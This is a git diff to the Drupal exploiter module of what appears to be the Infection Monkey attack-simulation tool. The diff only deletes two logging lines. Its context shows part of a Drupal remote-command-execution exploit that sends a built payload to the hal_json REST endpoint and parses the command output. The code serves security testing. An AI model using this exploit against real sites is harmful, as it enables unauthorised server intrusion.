diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py index 8d017fb31..d1cf1f027 100644 --- a/monkey/infection_monkey/exploit/drupal.py +++ b/monkey/infection_monkey/exploit/drupal.py @@ -85,8 +85,6 @@ class DrupalExploiter(WebRCE): base = remove_port(url) payload = build_cmd_execution_payload(base, cmd) - LOG.info(payload) - r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) if is_response_cached(r): @@ -96,7 +94,6 @@ class DrupalExploiter(WebRCE): LOG.warning('Command execution _may_ have failed') result = r.text.split(ID_STRING)[-1] - LOG.info(f'Drupal exploit result = {result}') return result def get_target_url(self):